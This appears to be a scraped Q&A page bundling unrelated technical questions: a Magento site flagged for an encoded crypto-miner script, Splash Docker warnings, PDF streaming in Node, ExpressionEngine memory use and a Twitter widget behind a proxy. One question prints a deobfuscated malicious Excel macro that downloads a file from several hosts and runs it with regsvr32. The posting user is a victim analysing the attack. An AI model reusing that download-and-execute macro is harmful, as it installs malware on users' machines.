When I scan my magento website it Detected encoded JavaScript code commonly used to hide suspicious behaviour - security

When I scan my magento website (using tool: https://scanner.pcrisk.com/) it Detected encoded JavaScript code commonly used to hide suspicious behaviour.
Severity: Suspicious
Reason: Detected malicious crypto miner
Details: Detected encoded JavaScript code commonly used to hide suspicious behaviour.
Offset: 8
Threat dump: View code
File size[byte]: 347199
File type: HTML
MD5: 3830153B59E769056519C688A49C733E
Scan duration[sec]: 4.652
I didn't find anything in code.
Is there a way around it ?
I'd like to get rid of the "suspicious flag".

Related

urlmon / URLDownloadToFil - Skipped downloads

To cut a long story short, I got duped: I opened a malicious Excel file and ran the macro.
After digging through the guts of the Excel file, the payload was highly obfuscated but I managed to piece it together:
=CALL("urlmon","URLDownloadToFilA","JJCCBB",0,"http://onlinebrandedcontent.com/XXXXXX/","..\enu.ocx",0,0)
=IF(<0, CALL("urlmon","URLDownloadToFilA","JJCCBB",0,"http://onlinebrandedcontent.com/XXXXXX/","..\enu.ocx",0,0))
=IF(<0, CALL("urlmon","URLDownloadToFilA","JJCCBB",0,"https://onlyfansgo.com/XXXXXX/","..\enu.ocx",0,0))
=IF(<0, CALL("urlmon","URLDownloadToFilA","JJCCBB",0,"http://www.marcoantonioguerrerafitness.com/XXXXXX/","..\enu.ocx",0,0))
=IF(<0, CALL("urlmon","URLDownloadToFilA","JJCCBB",0,"http://acceptanceh.us/XXXXXX/","..\enu.ocx",0,0))
=IF(<0, CALL("urlmon","URLDownloadToFilA","JJCCBB",0,"http://gloselweb.com/XXXXXX/","..\enu.ocx",0,0))
=IF(<0, CLOSE(0),)
=EXEC("C:\Windows\SysWow64\r"&"eg"&"sv"&"r32.exe /s ..\enu.ocx")
=RETURN()
Note: actual full URLs above redacted to avoid accidental exposure by anyone reading this.
When accessed, the malicious URLs contain the following contents:
onlinebrandedcontent: Standard Apache file index page with no contents
onlyfansgo: Boilerplate hosting provider "Account Suspended" page with no inclusions or Javascript.
marcoantonioguerrerafitness / acceptanceh / gloselweb: Triggers download of a (presumably malicious) DLL file
It appears the code above only got as far as the onlyfansgo URL (enu.ocx on my machine contains the harmless HTML "Account Suspended" markup with a reference to webmaster#onlyfansgo.com), so it looks like I dodged a bullet (regsvr32.exe would have attempted to register a HTML file and failed).
My question: Why did the payload pull the onlyfansgo URL response but stop there? If it was willing to accept a HTML file as a successful download, why did it not stop at onlinebrandedcontent? Is it something to do with the fact that onlyfansgo is the only HTTPS URL in the list?

Splash issues (d-bus, QSslSocket, libpng)

I'm trying to use Splash via scrapinghub/splash Docker image and have some alerts coming after the first request (which is to /robots.txt endpoint because I'm using scrapy-splash plugin for scrapy library (with Python 3.6).
[-] "172.17.0.1" - - [18/Jan/2018:00:05:12 +0000] "GET /robots.txt HTTP/1.1" 404 153 "-" "Scrapy/1.5.0 (+https://scrapy.org)"
libpng warning: iCCP: known incorrect sRGB profile
libpng warning: iCCP: known incorrect sRGB profile
process 1: D-Bus library appears to be incorrectly set up; failed to read machine uuid: UUID file '/etc/machine-id' should contain a hex string of length 32, not length 0, with no other text
See the manual page for dbus-uuidgen to correct this issue.
qt.network.ssl: QSslSocket: cannot resolve SSLv2_client_method
qt.network.ssl: QSslSocket: cannot resolve SSLv2_server_method
And the saddest thing is that it doesn't render this page. Also need to mention that sometimes it renders this page, and it contains redirect in case JS is available.
How to make it work?
UPDATE
When using scrapinghub/splash:3.0 these messages still, but render works.
So should I report it as bug in scrapinghub/splash image or these errors can be caused by my environment?
UPDATE
For some reason, even 3.0 doesn't render from now, as well as master (docker image tag). So for every image with latest or master or 3.0 tag, after asking (form on index endpoint) for render http://floodlist.com/news page it only shows a page with You are being redirected... title.
I found this issue so d-bus problem may be harmless.
process 1: D-Bus library appears to be incorrectly set up; failed to read machine uuid: UUID file '/etc/machine-id' should contain a hex string of length 32, not length 0, with no other text
See the manual page for dbus-uuidgen to correct this issue.
These would appear to be fairly concise instructions on how to fix the D-Bus issue.
I don’t know about the other warnings, or whether any of them are relevant.
These warnings/errors seems to be harmless (see #491 on Splash and #122 on scrapy-splash)
And the problem with rendering was solved by increasing wait value up to 1 second. More info about rendering issues here.

Streaming pdf file from node server randomly just shows binary data on browser

I have a node app (specifically sails app) that is serving pdf file. My code for serving file looks like this.
request.get(pdfUrl).pipe(res)
And when I view the url for pdf, it renders the pdf fine. But sometimes, it just renders the binary data of pdf on browser like given below.
%PDF-1.4 1 0 obj << /Title (��) /Creator (��wkhtmltopdf
I am not able to figure out why is it failing to serve the pdf correctly just randomly. Is it chrome thing? or Am I missing something?
Leaving this here in the hope that it helps somebody - I have had similar issues multiple times and its either of two things:
You're using an HTTP connection to an HTTPS delivery (this is typical with websockets, where you must specify :443 in addition to the wss.
request's encoding parameter is serving plaintext instead of objects. This is done by setting encoding to null as follows: request({url: myUrl, encoding: null}).
Content types in headers - steering clear of this since it's obvious/others have covered this substantially enough already :)
I am pretty sure you're facing this due to (2). Have a look at https://github.com/request/request
encoding - Encoding to be used on setEncoding of response data. If
null, the body is returned as a Buffer. Anything else (including the
default value of undefined) will be passed as the encoding parameter
to toString() (meaning this is effectively utf8 by default). (Note: if
you expect binary data, you should set encoding: null.)
Since, the aforementioned suggestions didn't work for you, would like to see forensics from the following:
Are files that fail over a particular size? Is this a buffer issue at some level?
Does the presence of a certain character in the file cause this because it breaks some of your script?
Are the meta-data sections and file-endings the same across a failed and a successful file? How any media file is signed up-top, and how it's truncated down-bottom, can greatly impact how it is interpreted
You may need to include the content type header application/pdf in the node response to tell the recipient that what they're receiving is a PDF. Some browsers are smart enough to determine the content type from the data stream, but you can't assume that's always the case.
When Chrome downloads the PDF as text I would check the very end of the file. The PDF file contains the obligatory xref table at the end. So every valid PDF file should end with the following sequence: %EOF. If not then the request was interrupted or something gone wrong.
You also need HTTP header:
Content-Disposition:inline; filename=sample.pdf;
And
Content-Length: 200
Did you try to save what ever binary stuff you get on disk and open it manually by PDF reader? It could be corrupt.
I would suggest trying both of these:
Content-Type: application/pdf
Content-Disposition: attachment; filename="somefilename.pdf"
(or controlling Mime Type in other ways: https://www.npmjs.com/package/mime-types)

High Memory Usage in ExpressionEngine Templates

I'm having an issue with, what I consider high memory usage, on a ExpressionEngine v2.5.3 install. This is a recent EE1 - EE2 upgrade if that makes a difference.
An empty template on this project uses 10MB of memory. I tested on another v2.5.3 project and an empty page there is using 2MB of memory. I'm seeing 30+MB usage on normal templates and frequently the browser loses its connection to the server.
Is an addon causing this increased memory usage? What's the best way to track this backwards?
The install is definitely acting up after this upgrade.
TEMPLATE DEBUGGING
(0.000011 / 9.01MB) - Begin Template Processing -
(0.000172 / 9.01MB) URI: test
(0.000185 / 9.01MB) Path.php Template: /
(0.000199 / 9.01MB) Retrieving Template
(0.000210 / 9.01MB) Parsing Template URI
(0.002112 / 9.02MB) Template Group Found: test
(0.002166 / 9.02MB) Retrieving Template from Database: test/index
(0.003599 / 9.02MB) Template Found
(0.003690 / 9.02MB) Template Type: webpage
(0.003711 / 9.02MB) Parsing Site Variables
(0.003767 / 9.02MB) Snippets (Keys): structure:is:page|structure:is:listing|structure:is:listing:parent|structure:page:entry_id|structure:page:template_id|structure:page:title|structure:page:slug|structure:page:uri|structure:page:url|structure:page:channel|structure:page:channel_short_name|structure:parent:entry_id|structure:parent:title|structure:parent:slug|structure:parent:uri|structure:parent:url|structure:parent:child_ids|structure:parent:channel|structure:parent:channel_short_name|structure:top:entry_id|structure:top:title|structure:top:slug|structure:top:uri|structure:top:url|structure:child_listing:channel_id|structure:child_listing:short_name|structure:freebie:entry_id|structure:child_ids|structure:sibling_ids|structure_1|structure_2|structure_3|structure_4|structure_5|structure_6|structure_7|structure_8|structure_9|structure_10|structure_last_segment|site_id|site_label|site_short_name|last_segment
(0.003784 / 9.02MB) Snippets (Values): FALSE||||||||||||||||||||||test|/test/|/test/||||||test||||||||||test|1|Ranch|default_site|test
(0.003926 / 9.02MB) Parse Date Format String Constants
(0.003943 / 9.02MB) Parse Current Time Variables
(0.003968 / 9.02MB) Parsing Segment, Embed, and Global Vars Conditionals
(0.007698 / 9.11MB) - Beginning Tag Processing -
(0.007719 / 9.11MB) - End Tag Processing -
(0.008645 / 9.12MB) Calling Extension Class/Method: Structure_ext/template_post_parse
(0.008789 / 9.11MB) - End Template Processing -
(0.008803 / 9.11MB) Parse Global Variables
(0.009574 / 9.11MB) Template Parsing Finished
Memory Usage: 10,163,144 bytes
Different versions of php, and different ways of implementing php ie: mod_php vs. fastcgi for instance, along with different functions enabled in php itself can lead to different levels of memory usage.
To test memory usage for just php being executed rather than in EE's template engine try the code below.
<?php
function echo_memory_usage() {
$mem_usage = memory_get_usage(true);
if ($mem_usage < 1024)
echo $mem_usage." bytes";
elseif ($mem_usage < 1048576)
echo round($mem_usage/1024,2)." kilobytes";
else
echo round($mem_usage/1048576,2)." megabytes";
echo "<br/>";
}
?>
you can pinpoint bottlenecks quite quickly with the Graphite add-on:
https://github.com/joelbradbury/Graphite.ee_addon
I find Graphite itself can really slow down your pages, but if you can get it to load ok it's awesome.
Starting with an empty template, with Template Debugging turned on, is a good start and eliminates any chance of tags causing the high memory use.
Is there anything different setting or add-on-wise between your 2Mb-usage installs and your current 10Mb-usage install? With template tags eliminated as a cause, you might want to look into add-ons that might be adding overhead, in particular extensions. Feel free to post the add-ons you have installed here.
Also disabling tracking and saving templates as files might save you some memory.
It seems the answer to my question is ~9MB is a normal starting level for a blank template on an EE install.
The template which starts at 2MB is on an EngineHosting VPS/VSC account with APC bytecode caching enabled, hence the difference in numbers.

Twitter Widget behind proxy

I'm trying to use Twitter widget in a site which server is inside my corporation, hence, behind its proxy.
I can't use directly the code they provide, since I can't reach the source address.
<script charset="utf-8" src="http://widgets.twimg.com/j/2/widget.js"></script>
I was wondering if I could make a local copy of the js so I could avoid this problem, but, when I did so I get:
ActionView::WrongEncodingError in Home#index
Your template was not saved as valid UTF-8. Please either specify UTF-8 as the encoding for your template in your text editor, or mark the template with its encoding by inserting the following as the first line of the template:
# encoding: <name of correct encoding>.
But the encoding its already set.
I'm really really newby with this stuff.
Please help.
The error you get is because ruby needs an explicit encoding to parse correctly a non latin-1 file.
In each ruby file that has utf-8 characters you need a first line like the example:
# encoding: UTF-8
As for the main problem in your question, you can try, but probably communication with twitter is blocked.
You should talk to your system administrator to try to get access to twitter for your app.

Resources